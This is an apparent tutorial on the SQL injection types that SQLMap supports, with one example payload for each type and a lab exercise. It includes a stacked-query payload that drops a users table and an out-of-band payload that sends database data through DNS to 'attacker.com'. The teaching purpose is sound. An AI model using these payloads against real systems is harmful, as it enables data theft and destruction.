Table of contents
Objective:
To provide a detailed, step-by-step guide on the various SQL injection types supported by SQLMap, enabling learners to understand and identify each type effectively.
Introduction to SQLMap
SQLMap is a powerful penetration testing tool for detecting and exploiting SQL injection vulnerabilities.
It supports a wide range of SQL injection techniques, making it a comprehensive tool for testing web application security.
Listing Supported SQL Injection Types
Use the command
sqlmap -hh
to view the list of supported SQL injection techniques.The
-technique
option allows you to specify the SQL injection techniques to use.The default value for
-technique
is "BEUSTQ", which represents the following techniques:B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries
Boolean-based Blind SQL Injection
Example payload:
AND 1=1
SQLMap exploits this vulnerability by differentiating between TRUE and FALSE query results.
It retrieves 1 byte of information per request by comparing server responses.
TRUE results have minimal or no difference from the regular server response.
FALSE results have substantial differences from the regular server response.
Boolean-based blind SQL injection is considered the most common type in web applications.
Error-based SQL Injection
Example payload:
AND GTID_SUBSET(@@version,0)
This technique relies on the DBMS returning error messages as part of the server response.
SQLMap uses specialized payloads targeting functions that cause known misbehaviors in specific DBMSes.
It supports error-based SQL injection for various DBMSes, including MySQL, PostgreSQL, Oracle, and more.
Error-based SQLi is faster than most other types, as it can retrieve data in chunks (e.g., 200 bytes) per request.
UNION Query-based SQL Injection
Example payload:
UNION ALL SELECT 1,@@version,3
This technique extends the original vulnerable query with the results of injected statements using UNION.
If the original query results are rendered in the response, the attacker can retrieve additional data from the injected statements.
UNION query-based SQLi is considered the fastest type, as it can potentially retrieve an entire database table with a single request.
Stacked Queries SQL Injection
Example payload:
; DROP TABLE users.
Also known as "piggy-backing," this technique injects additional SQL statements after the vulnerable one.
It is useful for running non-query statements like INSERT, UPDATE, or DELETE.
The vulnerable platform must support stacking queries (e.g., Microsoft SQL Server and PostgreSQL).
SQLMap can use stacked queries for advanced features like executing OS commands and retrieving data.
Time-based Blind SQL Injection
Example payload:
AND 1=IF(2>1,SLEEP(5),0)
Similar to boolean-based blind SQLi, this technique uses response time to differentiate between TRUE and FALSE.
TRUE responses have a noticeable difference in response time compared to regular server responses.
FALSE responses have response times indistinguishable from regular responses.
Time-based blind SQLi is slower than boolean-based blind SQLi but is used when the latter is not applicable (e.g., non-query statements).
Inline Queries SQL Injection
Example payload:
SELECT (SELECT @@version) from
This technique embeds a query within the original query.
It is uncommon and requires the vulnerable web application to be written in a specific way.
SQLMap supports this type of SQL injection.
Out-of-band SQL Injection
Example payload:
LOAD_FILE(CONCAT('\\\\\\\\',@@version,'.
attacker.com
\\\\README.txt'))
This advanced technique is used when other types are unsupported or too slow.
SQLMap supports out-of-band SQLi through "DNS exfiltration."
It forces the server to request non-existent subdomains containing the SQL response.
SQLMap collects these erroring DNS requests to form the entire SQL response.
Checkpoint Exercise
Set up a vulnerable web application with SQL injection vulnerabilities.
Use SQLMap to identify the supported SQL injection types for the application.
Attempt to exploit the application using each supported SQL injection type.
Analyze the results and understand the differences between each technique.